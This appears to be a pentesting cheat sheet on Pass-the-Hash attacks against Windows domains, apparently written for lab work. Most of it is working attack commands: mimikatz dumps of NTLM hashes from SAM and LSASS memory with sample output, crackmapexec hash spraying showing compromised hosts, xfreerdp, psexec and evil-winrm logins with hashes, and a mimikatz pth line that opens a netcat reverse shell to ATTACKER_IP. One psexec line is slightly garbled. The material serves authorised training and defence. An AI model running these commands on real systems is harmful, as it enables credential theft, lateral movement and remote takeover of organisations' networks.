Skip to content

Pass the hash

As a result of extracting credentials from a host where we have attained local administrative privileges (by using mimikatz or similar tools), we might get clear-text passwords or hashes that can be easily cracked. However, if we aren't lucky enough, we will end up with non-cracked NTLM password hashes.

Although it may seem we can't really use those hashes, the NTLM challenge sent during authentication can be responded to just by knowing the password hash. This means we can authenticate without requiring the plaintext password to be known. Instead of having to crack NTLM hashes, if the Windows domain is configured to use NTLM authentication, we can Pass-the-Hash (PtH) and authenticate successfully.

To extract NTLM hashes, we can either use mimikatz to read the local SAM or extract hashes directly from LSASS memory.



crackmapexec smb $IP_DC01 -u 'tom_admin' -H 4979d69d4ca66955c075c41cf45f24dc
crackmapexec smb $IP_MS01 -u user.txt -H uhash.txt
crackmapexec winrm $IP_MS01 -u 'tom_admin' -H 4979d69d4ca66955c075c41cf45f24dc
crackmapexec winrm $IP_MS01 -u user.txt -H uhash.txt

Extracting NTLM

hashes from local SAM

This method will only allow you to get hashes from local users on the machine. No domain user's hashes will be available.

mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> lsadump::sam  
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 145e02c50333951f71d13c245d352b50

hashes from LSASS memory

This method will let you extract any NTLM hashes for local users and any domain user that has recently logged onto the machine.

mimikatz> privilege::debug
mimikatz> token::elevate
mimikatz> sekurlsa::msv 
Authentication Id : 0 ; 308124 (00000000:0004b39c)
Session           : RemoteInteractive from 2 
User Name         : bob.jenkins
Domain            : ZA
Logon Server      : THMDC
Logon Time        : 2022/04/22 09:55:02
SID               : S-1-5-21-3330634377-1326264276-632209373-4605
        msv :
         [00000003] Primary
         * Username : bob.jenkins
         * Domain   : ZA
         * NTLM     : 6b4a57f67805a663c818106dc0648484   

Enumeration with hash

local administrator

crackmapexec smb -u administrator -H bdaffbfe64f1fc646a3353be1c2c3c99 --local-auth
# SMB   445 DC01  [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:DC01) (signing:True) (SMBv1:False)
# SMB   445 DC01  [-] DC01\administrator:bdaffbfe64f1fc646a3353be1c2c3c99 STATUS_LOGON_FAILURE 

# SMB  445 MS01  [*] Windows 10.0 Build 17763 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
# SMB  445 MS01  [+] MS01\administrator bdaffbfe64f1fc646a3353be1c2c3c99 (Pwn3d!) 🔥

# SMB  445 SQL01 [*] Windows 10.0 Build 17763 x64 (name:SQL01) (domain:SQL01) (signing:False) (SMBv1:False)
# SMB  445 SQL01 [+] SQL01\administrator bdaffbfe64f1fc646a3353be1c2c3c99 (Pwn3d!) 🔥

domain user

crackmapexec smb -u bob.jenkins -H 6b4a57f67805a663c818106dc0648484 -d EVIL.LOCAL

Pass the hash

From windows - use hash to execute command as other user

attack happen on the same machine

We can then use the extracted hashes to perform a PtH attack by using mimikatz to inject an access token for the victim user on a reverse shell (or any other command you like) as follows:

mimikatz> token::revert
mimikatz> sekurlsa::pth /user:bob.jenkins / /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"

Interestingly, if you run the whoami command on this shell, it will still show you the original user you were using before doing PtH, but any command run from here will actually use the credentials we injected using PtH.

From linux - use hash to access windows machine

from linux to windows machine attack

If you have access to a linux box (like your AttackBox), several tools have built-in support to perform PtH using different protocols. Depending on which services are available to you, you can do the following:

Execute command

crackmapexec winrm -u Administrator --port 5985 -H bdaffbfe64f1fc646a3353be1c2c3c99 -X 'powershell -e <BASE64>'

Connect to RDP using PtH

xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH

Connect via psexec using PtH -hashes NTLM_HASH DOMAIN/MyUser@VICTIM_IP
Note: Only the linux version of psexec support PtH.

Connect to WinRM using PtH

evil-winrm -i $IP -u $USER -H $NTLM_HASH